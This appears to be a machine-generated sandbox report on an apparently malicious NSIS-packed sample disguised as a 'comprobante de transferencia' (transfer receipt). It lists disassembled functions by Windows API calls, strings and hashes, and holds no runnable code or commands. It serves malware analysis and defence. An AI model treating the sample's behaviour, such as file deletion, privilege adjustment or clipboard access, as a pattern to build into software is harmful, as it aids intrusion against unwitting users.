                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 3714B31D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: T>E6
                                            • API String ID: 2538663250-157983146
                                            • Opcode ID: 3a7aa969023c033634a6d75f3f484087707d168cfe8498980eef656ff6ce289e
                                            • Instruction ID: 8296038bbcee6cc64f90257433aa9f759ac4c8d3457a7d9bf43c5dfe12d2ef40
                                            • Opcode Fuzzy Hash: 3a7aa969023c033634a6d75f3f484087707d168cfe8498980eef656ff6ce289e
                                            • Instruction Fuzzy Hash: F11115B59003488FDB20DF9AD484BDEFBF4EB48320F20845AD519A7700D378A944CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37146622
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7918e9dc7b60f71c83eacb166cf30f45e93d3b2f24a0a75714e132b3dfd788ff
                                            • Instruction ID: edf7ea5abdec4562ed68f54d57b2bcf617f6b873f1a387f51de1ea5067434d7a
                                            • Opcode Fuzzy Hash: 7918e9dc7b60f71c83eacb166cf30f45e93d3b2f24a0a75714e132b3dfd788ff
                                            • Instruction Fuzzy Hash: C251E3B1D10349AFDB15CFA9C980ADEFFB5BF48314F24812AE418AB210D771A985CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37146622
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c41e3d5c040bcbdeb8eba036d599ca22cd8fbf0d1e2b21b508c77db085aad539
                                            • Instruction ID: 0c341be8963fae65538eec3bb8d78e5e133b4ae4bf78978b7726e13d676751a2
                                            • Opcode Fuzzy Hash: c41e3d5c040bcbdeb8eba036d599ca22cd8fbf0d1e2b21b508c77db085aad539
                                            • Instruction Fuzzy Hash: 1C41D5B1D10349DFDB14CF99D984ADDFBB5BF48314F20812AE419AB210D775A985CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679251200.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 6c1b8d10b7350cbe01f73b51f053e550e164f3a21d3ea9ec18fc42392cacd189
                                            • Instruction ID: 18efbca75617fac50e8db5128f4590830ebaca4bccc50b7b37dd2c956e3fa309
                                            • Opcode Fuzzy Hash: 6c1b8d10b7350cbe01f73b51f053e550e164f3a21d3ea9ec18fc42392cacd189
                                            • Instruction Fuzzy Hash: C9415E70D00758DFDB10CFA9C88179EBBF1AB49300F14812AE865EB384DB75988ACF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 37148D11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 6c1b6f1c85adfc572472597fdcb1f00840221ced94a8faae87b57221df0c5320
                                            • Instruction ID: 8c2cf2be43d877b2e5e01ff8e8517bf1cac1ac01cdeb29790652e6ba618b5550
                                            • Opcode Fuzzy Hash: 6c1b6f1c85adfc572472597fdcb1f00840221ced94a8faae87b57221df0c5320
                                            • Instruction Fuzzy Hash: 9D4125B9900305DFDB14CF99C484BAABBF5FF99320F258859D519AB321D7B4A841CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679251200.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 5ed94e1cbdfd860b69beb8b7414918b8c56a74f427f4b4bcdd53f69a1fe46791
                                            • Instruction ID: f3af182b45a7b6f26367b9e7458d207788701ad9cdd7410a6cb664e55cedd56a
                                            • Opcode Fuzzy Hash: 5ed94e1cbdfd860b69beb8b7414918b8c56a74f427f4b4bcdd53f69a1fe46791
                                            • Instruction Fuzzy Hash: 254127B0D00658DFDB10DFA9C88579EBBF1AB48304F148129E825BB385DB75988ACF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3705C38F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 7805e9ecbca447e36a430a25f17bca87384264fa9033ee38efdb2ed23c8ba8a8
                                            • Instruction ID: 6238d8c11f91a369adf66943a05ba58003232eec291c0f1377e853c29e214cbf
                                            • Opcode Fuzzy Hash: 7805e9ecbca447e36a430a25f17bca87384264fa9033ee38efdb2ed23c8ba8a8
                                            • Instruction Fuzzy Hash: 9E21F4B5900249AFDB10CFAAD884ADEBBF4EB48320F14845AE954A3311D378A954CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3705C38F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: bfd75020b7ccc570061f07e239eb678ed945e5997d00949cad856a6a28a53d61
                                            • Instruction ID: 96a86cd23a96a9f437e73a98110cfe2465cf153e05bf49d50ac9897550076426
                                            • Opcode Fuzzy Hash: bfd75020b7ccc570061f07e239eb678ed945e5997d00949cad856a6a28a53d61
                                            • Instruction Fuzzy Hash: AA21D5B5D00349AFDB10CFAAD984ADEFBF4EB48320F14845AE954A7310D378A954CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindWindowW.USER32(00000000,00000000), ref: 37141406
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FindWindow
                                            • String ID:
                                            • API String ID: 134000473-0
                                            • Opcode ID: 547ab286f0f85cc06b3a611c50318c69b67de9c77bbfb516ea42db6d9cf4eb74
                                            • Instruction ID: bbc93536511a578356c423d51b7a10c35fdc0655c1f259dfba5cd91ae22b0be3
                                            • Opcode Fuzzy Hash: 547ab286f0f85cc06b3a611c50318c69b67de9c77bbfb516ea42db6d9cf4eb74
                                            • Instruction Fuzzy Hash: 00212FBAC007499FCB00CF9AD884ADEFBB4FB49320F64852ED819B7601D374A544CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindWindowW.USER32(00000000,00000000), ref: 37141406
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FindWindow
                                            • String ID:
                                            • API String ID: 134000473-0
                                            • Opcode ID: f43ed1d09682aef759a8b8c2b3e12338a63232430aa6878fd43fd4c0ce3657cb
                                            • Instruction ID: f6589d28cafa75acfbf29d0775bf366ab9de111bafa503683e8aa0f646b67335
                                            • Opcode Fuzzy Hash: f43ed1d09682aef759a8b8c2b3e12338a63232430aa6878fd43fd4c0ce3657cb
                                            • Instruction Fuzzy Hash: 9C1100BAD003099FDB10CF9AD884ADEFBB4FB49320F54852ED419B7600D375A544CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7678864557.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_ad000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 731edb0dea1f5f9cf1d500333f3bd7c205c79dbd3d8abafef6de9f9942c24a69
                                            • Instruction ID: 52dd5180c4d7ac1afe7a30ff7dcb44aadfedad14e6ce351c3d5da890896af0fd
                                            • Opcode Fuzzy Hash: 731edb0dea1f5f9cf1d500333f3bd7c205c79dbd3d8abafef6de9f9942c24a69
                                            • Instruction Fuzzy Hash: 36213471604340EFDB20DF64D9C4F16BBA1EB89314F30C56AD84A4F646C336D847CA62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7678864557.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_ad000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0cd37bb732839d99b1d32613c8d16dd7f2fc421af5c79a5997912ce9efe1ff0
                                            • Instruction ID: f5d2ac23b99508816e156620a617840a325b62789a28b2feeb08b0378c61d4b3
                                            • Opcode Fuzzy Hash: d0cd37bb732839d99b1d32613c8d16dd7f2fc421af5c79a5997912ce9efe1ff0
                                            • Instruction Fuzzy Hash: 8C11DD75504280DFCB11CF54D5C4B15FBA2FB89314F28C6AAD84A4BA56C33AD84ACBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNEL32 ref: 0040328D
                                            • GetVersion.KERNEL32 ref: 00403293
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                            • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                            • OleInitialize.OLE32(00000000), ref: 004032E6
                                            • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                            • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 0040332A
                                            • CharNextW.USER32(00000000,00434000,00000020), ref: 00403351
                                              • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                              • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                            • GetTempPathW.KERNEL32(00000400,00436800), ref: 0040348B
                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040349C
                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 004034A8
                                            • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004034BC
                                            • lstrcatW.KERNEL32(00436800,Low), ref: 004034C4
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004034D5
                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004034DD
                                            • DeleteFileW.KERNEL32(00436000), ref: 004034F1
                                              • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                            • OleUninitialize.OLE32(?), ref: 004035BC
                                            • ExitProcess.KERNEL32 ref: 004035DD
                                            • lstrcatW.KERNEL32(00436800,~nsu), ref: 004035F0
                                            • lstrcatW.KERNEL32(00436800,0040926C), ref: 004035FF
                                            • lstrcatW.KERNEL32(00436800,.tmp), ref: 0040360A
                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 00403616
                                            • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403632
                                            • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                            • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 004036A0
                                            • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                            • ExitProcess.KERNEL32 ref: 00403783
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 2488574733-3195845224
                                            • Opcode ID: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                            • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                            • Opcode Fuzzy Hash: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                            • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                            • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                            • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                            • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                            • DeleteObject.GDI32(00000000), ref: 00404BEB
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                            • ShowWindow.USER32(?,00000005), ref: 00404D45
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                            • GlobalFree.KERNEL32(?), ref: 00404F25
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                            • InvalidateRect.USER32(?,00000000,?), ref: 00405076
                                            • ShowWindow.USER32(?,00000000), ref: 004050C4
                                            • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                            • ShowWindow.USER32(00000000), ref: 004050D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                            • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                            • Opcode Fuzzy Hash: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                            • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DeleteFileW.KERNEL32(?,?,76BF3420,00436800,00000000), ref: 00405834
                                            • lstrcatW.KERNEL32(004246F0,\*.*), ref: 0040587C
                                            • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,76BF3420,00436800,00000000), ref: 004058A5
                                            • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,76BF3420,00436800,00000000), ref: 004058B5
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                            • FindClose.KERNEL32(00000000), ref: 00405964
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 2035342205-1173974218
                                            • Opcode ID: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                            • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                            • Opcode Fuzzy Hash: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                            • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                            • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                            • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                            • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindFirstFileW.KERNEL32(76BF3420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,76BF3420,?,00436800,0040582B,?,76BF3420,00436800), ref: 00406368
                                            • FindClose.KERNEL32(00000000), ref: 00406374
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: 8WB
                                            • API String ID: 2295610775-3088156181
                                            • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                            • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                            • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                            • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 00405316
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                            • GetClientRect.USER32(?,?), ref: 00405362
                                            • GetSystemMetrics.USER32(00000002), ref: 00405369
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                            • ShowWindow.USER32(?,00000008), ref: 00405405
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                            • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                              • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                            • CloseHandle.KERNEL32(00000000), ref: 0040548D
                                            • ShowWindow.USER32(00000000), ref: 004054B1
                                            • ShowWindow.USER32(?,00000008), ref: 004054B6
                                            • ShowWindow.USER32(00000008), ref: 00405500
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                            • CreatePopupMenu.USER32 ref: 00405545
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                            • GetWindowRect.USER32(?,?), ref: 00405579
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                            • OpenClipboard.USER32(00000000), ref: 004055DA
                                            • EmptyClipboard.USER32 ref: 004055E0
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                            • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                            • CloseClipboard.USER32 ref: 0040563B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {$&B
                                            • API String ID: 590372296-2518801558
                                            • Opcode ID: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
                                            • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                            • Opcode Fuzzy Hash: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
                                            • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                            • ShowWindow.USER32(?), ref: 00403C5F
                                            • DestroyWindow.USER32 ref: 00403C73
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                            • GetDlgItem.USER32(?,?), ref: 00403CB0
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                            • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                            • GetDlgItem.USER32(?,?), ref: 00403D79
                                            • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
